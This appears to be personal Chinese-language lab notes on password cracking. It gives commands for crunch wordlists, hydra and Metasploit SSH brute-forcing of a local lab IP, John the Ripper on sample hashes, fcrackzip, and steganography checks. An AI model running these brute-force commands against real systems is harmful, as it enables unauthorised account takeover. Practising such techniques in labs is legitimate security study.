note

暴力破解

字典生成—-在线密码破解工具hydra和medusa的使用

hydra、patator密碼破解: Linux SSH密碼暴力破解技術及攻擊實戰

可以使用crunch生成字典: Linux下的字典生成工具Crunch,創造自己的專屬字典如何用crunch生成字典apt install crunch

找到charset.lst的路徑(whereis crunch)

 # 找到路徑創建字典
crunch 1 8 -f /usr/share/crunch/charset.lst .lst mixalpha-numeric-all-space -o wordlist.txt
# 這個創建會超大 53TB ?!

線上字典檔案(15GB) CrackStation’s Password Cracking Dictionary

hydra

sudo apt-get update
sudo apt-get install hydra

/*sudo add-apt-repository "deb [trusted=yes] http://archive.ubuntu.com/ubuntu/ saucy universe multiverse"  ## 新增 deb http://archive.ubuntu.com/ubuntu/ saucy universe multiverse" 到 /etc/apt/sources.list
sudo apt-get update*/



sudo apt-get update出現updating from such a repository can't be done securely

vim /etc/apt/sources.list
deb [trusted=yes] https://archive.deb-multimedia.org/ jessie main ## 加入到最尾端

之後再輸入sudo apt-get update會出現gpg error ,後面有一串: ` the public key is not available: NO_PUBKEY 5C808C2B65558117`,把數字新增到apt-key裡面

sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 5C808C2B65558117
apt-key list  ## 查看新增的key

之後就可以sudo apt-get了!!

sudo apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird-dev libncp-dev hydra

libncp-dev 裝不了,apt-get update一直抱錯QQ

下面是另一種裝法,使用git

sudo apt-get -y install build-essential
sudo apt-get install git
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra
./configure
make
make install

Remove hydra

sudo apt-get purge hydra-gtk
sudo apt-get autoremove
sudo apt-get autoclean
## 也可以寫成下面一行
sudo apt-get purge hydra-gtk && sudo apt-get autoremove && sudo apt-get autoclean

Medusa

參考網站: 利用kali中的medusa進行ssh密碼檢測

apt install git
git clone https://github.com/jmk-foofus/medusa.git

需要先載gcc和libssl-dev才能使用configure產生Makefile

apt install gcc
apt-get install libssl-dev
./configure   ## 在medusa下使用
make
make install

John the Ripper(JTR)

參考網站: John the Ripper (JTR) 密碼破解簡單使用教學Linux 的 /etc/shadow 檔案結構:儲存真實密碼的地方

有了shadow檔和passwd檔案,就可以使用這個工具破解密碼

沒有用QQ

先把密文存成一個檔案test01.txt,再使用 john -si test01.txt

M2Y5WVU4nQNK6
M2AERmE1jWn2E
M2dkTuewmYzJY
M2GMcSXbX0v6E
sudo apt update
sudo apt install snapd
sudo snap install john-the-ripper
john -si test01.txt  ## 簡單模式
john -w:j2.txt test01.txt  ## 字典模式
# /snap/bin/john/j2.txt
john -i test01.txt  ## 窮舉模式
john --incremental --format=md5crypt test01.txt  ## 暴力破解

wifi密碼破解: 黑客暴力破解必備的12大逆向工具

使用遠端破解密碼

SSH: Gain SSH Access to Servers by Brute-Forcinghydra破解工具

可以使用單人模式進行破解

但我們這裡使用nmaphydra進行破解

nmap: 可以獲得虛擬機的資訊

hydra: 可以對帳號密碼使用暴力破解,不過需要提供字典,可以上網使用rockyou.txt

sudo apt-get install nmap  ## 安裝套件,centos 使用 yum install nmap

nmap -A 192.168.157.0/24  ## 對目前的區域網路進行掃瞄,會拿到有連線到目前區域的IP(192.168.157.128)

ssh user1@192.168.157.128  ## 需要使用者帳密
sudo apt install hydra  ## 安裝套件

hydra -l user.txt -P passwords.txt -t 4 192.168.157.128 ssh  ## -t代表開4個線程,比較快

上面hydra可以遠端破解,可以把user.txt檔案裏面的user使用password.txt暴力破解

msfconsole

在centos使用msfconsole

centos install msfconsolecentos install hydra

yum install -y dnf

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

chmod +x msfinstall

./msfinstall

msfdb init 

user: y,password: 沒有

msfconsole
search ssh   ## search scanner/ssh
use auxiliary/scanner/ssh/ssh_login
options
set rhosts [172.16.1.102](target IP)
set stop_on_success true
set user_file users.txt
set pass_file passwords.txt
set verbose true
run

rockyou.txt: https://github.com/praetorian-inc/Hob0Rules

user.txt: https://github.com/ThomasTJdev/WMD

關閉防火牆和保護裝置

破解壓縮檔案密碼

參考網站: 破解ZIP 密碼的四大方法fcrackzipHow to crack zip password on Kali Linux

sudo apt install fcrackzip
## -b 是暴力破解,-c 為指定字串指定A為大寫A-Z,1為數字0-9, -l 指定位數, -u 僅顯示破解出來的密碼
fcrackzip -b -c 'a1' -l 1-5 -u a.zip  
fcrackzip -D -u -p rockyou.txt a.zip

查看圖片文字

參考網站: 查看圖片詳細情況extract text from imageswindows藏檔案到圖片

apt install ruby
gem install zsteg
zsteg -a output.png  ## -a 查看全部情況

安裝Homebrew,可以使用brew為tesseract安裝語言包

sudo apt-get install build-essential curl file git
## 下面這部不能用root執行,要用一般使用者
sh -c "$(curl -fsSL https://raw.githubusercontent.com/Linuxbrew/install/master/install.sh)"
export PATH="/home/linuxbrew/.linuxbrew/bin:$PATH"
brew install tesseract-lang

下面無法成功

sudo apt-get install tesseract-ocr
apt install imagemagick-6.q16
convert output.png  -bordercolor White -border 10x10 output.png
tesseract filename.jpg output.txt
tesseract filename.jpg stdout  ## 顯示到螢幕上
tesseract filename.jpg stdout --dpi 72  ## 加上dpi(70~2400),有點像解析度的東東

else

centos7重製root 密碼

修改root密碼: sudo passwd root

修改putty 裡面的vim註釋顏色: vim /etc/vim/vimrc,按下大寫G到最後一行插入 set background=dark

如果SSH報錯,可以使用: sshd -T 查看錯誤原因

密碼破解法: Linux下的密碼Hash密碼字典檔生成工具 - crunch

其他網站

evalsciencet靶機通關筆記: 這個寫的很好,入侵靶機

鳥哥的 Linux 私房菜: 這個網站可以學習Linux

MD5破解網站

編碼/解碼網站

密碼類型判斷

使用johnny進行密碼破解

使用python對SHA進行暴力破解